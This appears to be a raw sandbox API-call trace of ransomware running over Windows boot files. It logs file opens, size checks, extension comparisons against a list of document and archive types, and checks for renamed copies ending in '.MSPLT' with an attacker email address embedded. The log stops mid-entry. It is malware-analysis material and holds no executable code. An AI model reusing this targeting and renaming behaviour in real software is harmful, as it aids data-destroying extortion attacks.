[0286.468] CreateFileW (lpFileName="C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.468] lstrlenW (lpString="C:\\Boot\\lv-LV\\bootmgr.exe.mui") returned 29 [0286.468] lstrlenW (lpString="C:\\Boot\\lv-LV\\bootmgr.exe.mui") returned 29 [0286.468] lstrlenW (lpString=".doc") returned 4 [0286.468] lstrlenW (lpString="C:\\Boot\\lv-LV\\bootmgr.exe.mui") returned 29 [0286.469] lstrlenW (lpString="C:\\Boot\\lv-LV\\bootmgr.exe.mui") returned 29 [0286.469] lstrlenW (lpString=".doc") returned 4 [0286.469] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.469] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=811936) returned 1 [0286.469] CloseHandle (hObject=0x348) returned 1 [0286.469] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20 [0286.469] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\memtest.exe.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.469] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.469] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0286.469] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0286.469] lstrlenW (lpString=".doc") returned 4 [0286.470] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0286.470] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0286.470] lstrlenW (lpString=".doc") returned 4 [0286.470] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.470] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=75616) returned 1 [0286.470] CloseHandle (hObject=0x348) returned 1 [0286.470] GetFileAttributesW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui")) returned 0x20 [0286.470] GetFileAttributesW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.470] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.471] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0286.471] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0286.471] lstrlenW (lpString=".doc") returned 4 [0286.471] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0286.471] lstrlenW (lpString="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 29 [0286.471] lstrlenW (lpString=".doc") returned 4 [0286.471] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.471] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=45472) returned 1 [0286.471] CloseHandle (hObject=0x348) returned 1 [0286.471] GetFileAttributesW (lpFileName="C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui")) returned 0x20 [0286.472] GetFileAttributesW (lpFileName="C:\\Boot\\nb-NO\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.472] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\memtest.exe.mui" (normalized: "c:\\boot\\nb-no\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.472] lstrlenW (lpString="C:\\Boot\\nb-NO\\memtest.exe.mui") returned 29 [0286.472] lstrlenW (lpString="C:\\Boot\\nb-NO\\memtest.exe.mui") returned 29 [0286.472] lstrlenW (lpString=".doc") returned 4 [0286.472] lstrlenW (lpString="C:\\Boot\\nb-NO\\memtest.exe.mui") returned 29 [0286.472] lstrlenW (lpString="C:\\Boot\\nb-NO\\memtest.exe.mui") returned 29 [0286.472] lstrlenW (lpString=".doc") returned 4 [0286.472] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.472] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=78176) returned 1 [0286.472] CloseHandle (hObject=0x348) returned 1 [0286.473] GetFileAttributesW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui")) returned 0x20 [0286.473] GetFileAttributesW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.473] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.473] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0286.473] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0286.473] lstrlenW (lpString=".doc") returned 4 [0286.473] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0286.473] lstrlenW (lpString="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 29 [0286.473] lstrlenW (lpString=".doc") returned 4 [0286.473] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.473] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=45472) returned 1 [0286.473] CloseHandle (hObject=0x348) returned 1 [0286.475] GetFileAttributesW (lpFileName="C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui")) returned 0x20 [0286.475] GetFileAttributesW (lpFileName="C:\\Boot\\nl-NL\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.475] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\memtest.exe.mui" (normalized: "c:\\boot\\nl-nl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.475] lstrlenW (lpString="C:\\Boot\\nl-NL\\memtest.exe.mui") returned 29 [0286.475] lstrlenW (lpString="C:\\Boot\\nl-NL\\memtest.exe.mui") returned 29 [0286.475] lstrlenW (lpString=".doc") returned 4 [0286.475] lstrlenW (lpString="C:\\Boot\\nl-NL\\memtest.exe.mui") returned 29 [0286.475] lstrlenW (lpString="C:\\Boot\\nl-NL\\memtest.exe.mui") returned 29 [0286.475] lstrlenW (lpString=".doc") returned 4 [0286.476] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.476] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.476] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.476] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=77656) returned 1 [0286.476] CloseHandle (hObject=0x348) returned 1 [0286.476] GetFileAttributesW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui")) returned 0x20 [0286.476] GetFileAttributesW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.476] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.476] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0286.476] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0286.476] lstrlenW (lpString=".doc") returned 4 [0286.476] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.476] lstrlenW (lpString=".docx") returned 5 [0286.476] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.476] lstrlenW (lpString=".pdf") returned 4 [0286.477] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.477] lstrlenW (lpString=".xls") returned 4 [0286.477] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.477] lstrlenW (lpString=".xlsx") returned 5 [0286.477] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.477] lstrlenW (lpString=".ppt") returned 4 [0286.477] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.477] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0286.477] lstrlenW (lpString=".zip") returned 4 [0286.477] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.477] lstrlenW (lpString=".rar") returned 4 [0286.477] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.477] lstrlenW (lpString=".bz2") returned 4 [0286.477] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.477] lstrlenW (lpString=".7z") returned 3 [0286.477] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.477] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0286.477] lstrlenW (lpString=".dbf") returned 4 [0286.477] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.477] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0286.477] lstrlenW (lpString=".1cd") returned 4 [0286.477] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.477] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0286.477] lstrlenW (lpString=".jpg") returned 4 [0286.477] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.477] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0286.477] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0286.477] lstrlenW (lpString=".doc") returned 4 [0286.478] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.478] lstrlenW (lpString=".docx") returned 5 [0286.478] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.478] lstrlenW (lpString=".pdf") returned 4 [0286.478] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.478] lstrlenW (lpString=".xls") returned 4 [0286.478] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.478] lstrlenW (lpString=".xlsx") returned 5 [0286.478] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.478] lstrlenW (lpString=".ppt") returned 4 [0286.478] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.478] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0286.478] lstrlenW (lpString=".zip") returned 4 [0286.478] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.478] lstrlenW (lpString=".rar") returned 4 [0286.478] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.478] lstrlenW (lpString=".bz2") returned 4 [0286.478] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.478] lstrlenW (lpString=".7z") returned 3 [0286.478] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.478] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0286.478] lstrlenW (lpString=".dbf") returned 4 [0286.478] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.478] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0286.478] lstrlenW (lpString=".1cd") returned 4 [0286.478] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.478] lstrlenW (lpString="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 29 [0286.479] lstrlenW (lpString=".jpg") returned 4 [0286.479] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.479] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.479] lstrlenW (lpString="memtest.exe.mui") returned 15 [0286.479] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.479] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=45984) returned 1 [0286.479] CloseHandle (hObject=0x348) returned 1 [0286.479] GetFileAttributesW (lpFileName="C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui")) returned 0x20 [0286.480] GetFileAttributesW (lpFileName="C:\\Boot\\pl-PL\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.480] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.480] lstrlenW (lpString="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 29 [0286.480] lstrlenW (lpString="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 29 [0286.480] lstrlenW (lpString=".doc") returned 4 [0286.480] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.480] lstrlenW (lpString=".docx") returned 5 [0286.480] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.480] lstrlenW (lpString=".pdf") returned 4 [0286.480] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.480] lstrlenW (lpString=".xls") returned 4 [0286.480] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.480] lstrlenW (lpString=".xlsx") returned 5 [0286.480] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.480] lstrlenW (lpString=".ppt") returned 4 [0286.480] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.480] lstrlenW (lpString="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 29 [0286.480] lstrlenW (lpString=".zip") returned 4 [0286.480] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.480] lstrlenW (lpString=".rar") returned 4 [0286.480] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.480] lstrlenW (lpString=".bz2") returned 4 [0286.480] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.480] lstrlenW (lpString=".7z") returned 3 [0286.481] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.481] lstrlenW (lpString="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 29 [0286.481] lstrlenW (lpString=".dbf") returned 4 [0286.481] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.481] lstrlenW (lpString="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 29 [0286.481] lstrlenW (lpString=".1cd") returned 4 [0286.481] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.481] lstrlenW (lpString="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 29 [0286.481] lstrlenW (lpString=".jpg") returned 4 [0286.481] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.481] lstrlenW (lpString="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 29 [0286.481] lstrlenW (lpString="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 29 [0286.481] lstrlenW (lpString=".doc") returned 4 [0286.481] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.481] lstrlenW (lpString=".docx") returned 5 [0286.481] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.481] lstrlenW (lpString=".pdf") returned 4 [0286.481] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.481] lstrlenW (lpString=".xls") returned 4 [0286.481] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.481] lstrlenW (lpString=".xlsx") returned 5 [0286.481] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.481] lstrlenW (lpString=".ppt") returned 4 [0286.481] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.481] lstrlenW (lpString="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 29 [0286.481] lstrlenW (lpString=".zip") returned 4 [0286.481] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.482] lstrlenW (lpString=".rar") returned 4 [0286.482] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.482] lstrlenW (lpString=".bz2") returned 4 [0286.482] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.482] lstrlenW (lpString=".7z") returned 3 [0286.482] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.482] lstrlenW (lpString="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 29 [0286.482] lstrlenW (lpString=".dbf") returned 4 [0286.482] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.482] lstrlenW (lpString="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 29 [0286.482] lstrlenW (lpString=".1cd") returned 4 [0286.482] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.482] lstrlenW (lpString="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 29 [0286.482] lstrlenW (lpString=".jpg") returned 4 [0286.482] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.482] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.482] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.482] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.483] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=76640) returned 1 [0286.483] CloseHandle (hObject=0x348) returned 1 [0286.483] GetFileAttributesW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui")) returned 0x20 [0286.483] GetFileAttributesW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.483] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.483] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0286.483] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0286.483] lstrlenW (lpString=".doc") returned 4 [0286.483] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.483] lstrlenW (lpString=".docx") returned 5 [0286.484] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.484] lstrlenW (lpString=".pdf") returned 4 [0286.484] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.484] lstrlenW (lpString=".xls") returned 4 [0286.484] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.484] lstrlenW (lpString=".xlsx") returned 5 [0286.484] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.484] lstrlenW (lpString=".ppt") returned 4 [0286.484] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.484] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0286.484] lstrlenW (lpString=".zip") returned 4 [0286.484] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.484] lstrlenW (lpString=".rar") returned 4 [0286.484] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.484] lstrlenW (lpString=".bz2") returned 4 [0286.484] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.484] lstrlenW (lpString=".7z") returned 3 [0286.484] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.484] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0286.484] lstrlenW (lpString=".dbf") returned 4 [0286.484] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.484] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0286.484] lstrlenW (lpString=".1cd") returned 4 [0286.484] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.484] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0286.484] lstrlenW (lpString=".jpg") returned 4 [0286.484] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.484] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0286.484] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0286.484] lstrlenW (lpString=".doc") returned 4 [0286.484] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.484] lstrlenW (lpString=".docx") returned 5 [0286.484] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.485] lstrlenW (lpString=".pdf") returned 4 [0286.485] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.485] lstrlenW (lpString=".xls") returned 4 [0286.485] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.485] lstrlenW (lpString=".xlsx") returned 5 [0286.485] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.485] lstrlenW (lpString=".ppt") returned 4 [0286.485] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.485] lstrlenW (lpString="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 29 [0286.485] lstrlenW (lpString=".zip") returned 4 [0286.485] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.485] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.485] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.485] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=45472) returned 1 [0286.485] CloseHandle (hObject=0x348) returned 1 [0286.485] GetFileAttributesW (lpFileName="C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui")) returned 0x20 [0286.486] GetFileAttributesW (lpFileName="C:\\Boot\\pt-BR\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.486] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\memtest.exe.mui" (normalized: "c:\\boot\\pt-br\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.486] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.486] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.486] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=76640) returned 1 [0286.486] CloseHandle (hObject=0x348) returned 1 [0286.486] GetFileAttributesW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui")) returned 0x20 [0286.486] GetFileAttributesW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.486] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.487] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.487] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\memtest.exe.mui" (normalized: "c:\\boot\\pt-pt\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, 